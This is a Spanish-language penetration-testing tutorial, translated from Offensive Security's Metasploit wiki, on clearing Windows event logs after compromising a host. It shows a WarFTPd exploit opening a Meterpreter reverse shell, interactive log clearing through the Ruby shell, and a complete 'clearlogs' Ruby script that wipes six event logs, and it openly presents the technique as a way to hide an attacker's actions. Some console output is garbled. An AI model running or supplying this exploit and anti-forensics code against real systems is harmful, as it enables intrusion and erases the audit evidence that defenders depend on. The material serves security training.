Administración de registros

De www.metasploit-es.com.ar

Administración de registros


¿Sabes? A veces es mejor no tener sus actividades registradas. Cualquiera que sea el motivo, algún día puedes encontrarte en una situación en la que necesitas eliminar los logs / registros de eventos de Windows. Echándole un vistazo a la fuente del script winenum, ubicado en 'scripts / meterpreter', podemos ver el funcionamiento de esta función. 

def clrevtlgs(session)
    evtlogs = [
        'security',
        'system',
        'application',
        'directory service',
        'dns server',
        'file replication service'
        ]
    print_status("Clearing Event Logs, this will leave and event 517")
    begin
    evtlogs.each do |evl|
        print_status("tClearing the #{evl} Event Log")
        log = session.sys.eventlog.open(evl)
        log.clear
    end
    print_status("Alll Event Logs have been cleared")
    rescue ::Exception => e
        print_status("Error clearing Event Log: #{e.class} #{e}")

    end
end

Veamos un escenario donde tenemos que limpiar el registro de eventos de Windows, pero en lugar de usar un script prefabricado para hacer el trabajo para nosotros, vamos a utilizar el poder del intérprete de Ruby en Meterpreter para limpiar los registros sobre la marcha. Vamos a Windows / 'System' / LogReg.

9 MSF Post Exploitation-CODE html 41c43217.jpg

Ahora vamos a explotar el sistema y eliminar manualmente los registros. Haremos nuestra base de comandos fuera del script winenum. ejecutando 'log = client.sys.eventlog.open('system')' se abrirá el registro para nosotros. 

msf exploit(warftpd_165_user) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (172.16.104.130:4444 -> 172.16.104.145:1246)

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> log = client.sys.eventlog.open('system')
=> #<#:0xb6779424 @client=#>, #>, #

"windows/browser/facebook_extractiptc"=>#, 
"windows/antivirus/trendmicro_serverprotect_earthagent"=>#, 
"windows/browser/ie_iscomponentinstalled"=>#, 
"windows/exec/reverse_ord_tcp"=>#,
"windows/http/apache_chunked"=>#, 
"windows/imap/novell_netmail_append"=>#

Ahora veremos si podemos limpiar el registro ejecutando 'log.clear'. 

>> log.clear
=> #<#:0xb6779424 @client=#>,

/trendmicro_serverprotect_earthagent"=>#, 
"windows/browser/ie_iscomponentinstalled"=>#, 
"windows/exec/reverse_ord_tcp"=>#, 
"windows/http/apache_chunked"=>#, 
"windows/imap/novell_netmail_append"=>#

¿Funciona?

9 MSF Post Exploitation-CODE html m68665aae.jpg

Hemos tenido éxito! Como ves ya no existen registros por aquí. Ahora podemos profundizar mas y crear nuestro propio script para limpiar el registro de eventos... 

# Clears Windows Event Logs


evtlogs = [
    'security',
        'system',
        'application',
        'directory service',
        'dns server',
        'file replication service'
    ]
puts ("Clearing Event Logs, this will leave an event 517")
evtlogs.each do |evl|
    puts ("tClearing the #{evl} Event Log")
    log = client.sys.eventlog.open(evl)
    log.clear
end
puts ("All Clear! You are a Ninja!")

Después de escribir este pequeño script, lo guardamos en /pentest/exploits/framework3/scripts/meterpreter. Entonces volveremos a explotar el sistema y así ver si funciona. 

msf exploit(warftpd_165_user) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.104.130:4444 -> 172.16.104.145:1253)

meterpreter > run clearlogs
Clearing Event Logs, this will leave an event 517
    Clearing the security Event Log
    Clearing the system Event Log
    Clearing the application Event Log
    Clearing the directory service Event Log
    Clearing the dns server Event Log
    Clearing the file replication service Event Log
All Clear! You are a Ninja!
meterpreter > exit

Wasaaaa.Y el único evento que queda registrado en el sistema es el esperado 517.

9 MSF Post Exploitation-CODE html m4fd20a56.jpg

Este es el poder de Meterpreter. Sin mucho mas esfuerzo que no sea un código de ejemplos que hemos tomado de otro script, hemos creado una herramienta muy útil para ayudarnos a cubrir / borrar /esconder nuestras acciones.



© Offensive Security 2009 

Original by www.offensive-security.com
Traslated by FreeInfo
Obtenido de «http://www.metasploit-es.com.ar/wiki/index.php/Administraci%C3%B3n_de_registros»
Herramientas personales